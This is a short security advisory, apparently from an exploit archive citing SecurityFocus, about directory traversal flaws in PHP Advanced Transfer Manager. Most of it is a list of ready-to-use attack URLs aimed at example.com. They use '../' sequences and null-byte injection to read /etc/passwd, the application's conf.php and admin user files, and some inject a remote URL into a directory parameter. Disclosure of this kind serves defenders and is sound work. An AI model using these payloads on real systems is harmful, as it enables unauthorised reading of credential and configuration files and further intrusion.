source: https://www.securityfocus.com/bid/14883/info
PHP Advanced Transfer Manager is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
Exploitation of any of these vulnerabilities could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.
http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=http://www.asite.com%00
http://www.example.com/phpatm/html.php?current_dir=http:/&filename=www.asite.com
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../..&filename=[filename].zip
http://www.example.com/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php
http://www.example.com/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/admin%00
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00